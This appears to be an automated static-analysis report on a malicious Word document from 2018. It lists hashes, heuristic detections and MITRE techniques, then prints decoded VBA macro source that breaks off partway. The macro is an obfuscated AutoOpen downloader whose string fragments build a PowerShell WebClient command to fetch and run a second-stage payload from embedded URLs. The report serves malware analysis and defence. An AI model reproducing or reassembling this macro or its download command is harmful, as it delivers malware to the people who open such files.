Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f9034646e6fcead…

MALICIOUS

Office (OLE)

Size: 97.5 KB
Created: 2018-02-08 08:46:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0f0eb3c733a664c53695ea7fd1bc1519
SHA-1: 9015ed3922be9c6e43e647a72014de74d73cb984
SHA-256: 6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro uses the Shell() function to execute a payload, as indicated by the critical heuristic firings below. The script attempts to download and execute a second-stage payload from a suspicious URL, reconstructed from the obfuscated string fragments as 'https://www.blueyachtchiMcv5.com/oMgoZ/Y4iMDnJQlYpbrbfpXzw'.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMDnJQlYpbrbfpXzw (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      22085 bytes
SHA-256:   202da9918b22895c2548961f73fa3c9bf83722f7ea40e972332192a5a7e3fa5e
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UXEKrTcYdjApzI"
Sub AutoOpen()
On Error Resume Next
GhKJTcPUw = WwYGGoFlTaR - CGGOwmcLbKmlpl / (8656853 + GQGvZalCkHiC - 6899216 + GFXHiED)
FdcrnALLn = UvWfDUWab - DirHabVEjN / (6512393 + ofBmdDla - 4937609 + wqJHNaDlBjCjz)
amVRMfHia = NGqdQrSoBvLi - wTNuAvL / (195088 + FjbAImZ - 9164132 + MWHvAXwmt)
Application.Run "SssbuNrRrEn", JpruannMCh
isBonsmXz = kGiOiJBJCPjjOF - zLtCSqzNBdI / (473277 + siOkobLLd - 1513620 + mzNtXKCdwL)
ojsVfImsh = ZHkRTBwrnuSV - UPScDqr / (5163821 + GEDCVPJSYSw - 4326410 + fOvaVMKpCtTcYF)
End Sub
Function JpruannMCh()
On Error Resume Next
AsWoNDtOSr = KoCvtpnjiP - UMnpssIJTvZDc / (8103294 + CRsrtRjKXRtqOz - 3326745 + wYVXWYrhIa)
WfDPKR = caklZFvnWqqV - lCQYzBtMCZ / (5335036 + GSbdaKjThGj - 7373223 + TlTJvfHDzmT)
bBKQAnbCY = SiGhWaAJ - TnUJvjHC / (8140392 + TisfQaCGuUa - 1646542 + HVHbclKjjdZ)
UDzCsMhb = nLsjMjaAjtv + Mid(("ww+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]11NQAhUbDslUVNDrtZtqFwzidva"), 3, 137)
jaFiSm = GAdaCqGT - GofKGMnnEi / (3112661 + wjBTfSbCHvU - 4923864 + ZGshYmf)
czpWmUz = McotprmMMtVlc - RcHXYiRM / (2132570 + GJhFvGfsko - 7386360 + MZpapqvB)
KraVTsTmwFJ = oYRpQaBNAZARTn - KjQFNcAnVJP / (6474296 + zpaRJWRkPPfj - 5815884 + jOmpsmJQIZp)
ZEFrjkjH = wzAzwAB + Mid(("Oi'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.coYtRwtjPCtQPjtDmVFudQlhGKBwauURjRu"), 2, 185)
NqtzKtBTW = VvuQlZjwQYjUWv - jjAbVAdzTk / (5958351 + KOYQDhvQOWroP - 820464 + XMMLdwvjiz)
BGREI = mzrvajGl - jsIfnbiKKo / (2431539 + RcGmHYBq - 2755715 + uSwuwYSvLhi)
zBSVSssO = nfEhYCSlZpl - VUlITHFuLFzqis / (5561257 + rOdihmo - 5249937 + ZAzYcEEjCZdn)
YivIOm = VnlvfAsUQLwiI + Mid(("GkP88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )IIsiiEzdVAW"), 4, 61)
AvwfC = jZMuLLGNijJZtH - WiBtJjS / (9864798 + hlaBzSGtV - 5241455 + ZMissaoqzd)
MtJQWC = ivWNlhoESNat - ZlEPQZQE / (3531688 + jJAIAjrcBowDi - 5983194 + hZFQJGzSWTGV)
wzfbEs = aXNfQHqElY - ValYEOWGZfiAK / (7674964 + hjqiotNR - 348210 + bTmXojwASvi)
NUzfsGU = cDcjTihN + Mid(("oYHjCEMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0nKOfWVGs"), 7, 180)
fBOVG = HaJNHjtHIjtdu - jkwmArsbLFcV / (8426173 + QXKHYbfwfSpQYn - 4880575 + hlNNQLvEWLwf)
dKHzPjiiBw = EllrzrlYl - SDnFfzj / (3646208 + BYYrIid - 1027922 + FlMdzhahEYY)
CJvhbhUBi = nNvjuKcFPHmsui - ftcNWlKTAspDG / (5931512 + tKuHNLcLOUBzLw - 9793562 + iVqunbKCKd)
QocZZzH = bOIzzwurWD + Mid(("CPiKUEYmiMP+iMP.Net.iMP'+'+iPLPllvajurvXTsfj"), 8, 21)
wUmYSqPnczw = NtVmwVBYHiPj - RArwkRhX / (1939287 + iYtkXVwFL - 8379375 + NRhYfYt)
QiiuZjf = zYHrHvbGp - NVLDfqNEkiD / (2041316 + DsFEjKYEsnI - 2434329 + XhmovOGYzVtKl)
KNKPwwDYDiL = LanPLmuDwCrsw - bVhCrqTfR / (9296715 + pDEFWLtzTMiE - 4737205 + ZuTikwDSpzcnrS)
jtiuZvh = vnEGWaRNbwmQfD + Mid(("MwoYIFZ'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EktnvKL"), 8, 160)
isiIzo = zRJERvz - hzfWOGdiTaCwjV / (2438817 + bqEVGswIpkAKi - 7510262 + zYiarBz)
PZRpThdQn = kUtXWrjXcE - cariqpAWj / (5718245 + SEjZDXw - 8911272 + pcVTANVbQJ)
jnijmKZ = YFMKbIus - qfSrdBorzoIZ / (6482714 + bzEXdcUZFXRi - 2472841 + WzudFIdKKiqwY)
jMjaNWuoBzR = XfIrjVjqwcrzuc + Mid(("kFhKZdpXrtfqjFzZziMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPatbAChdUGdjVNjElPToZ"), 18, 63)
zwcUYjaAT = RRZvZvpzU - tfTZGRpZhiEpvd / (4223806 + rqGLbKMpqLk - 2788915 + uJaJiiW)
sSCYaZFpCT = RPTUzDlLb - wZvEwrJYjS / (57
... (truncated)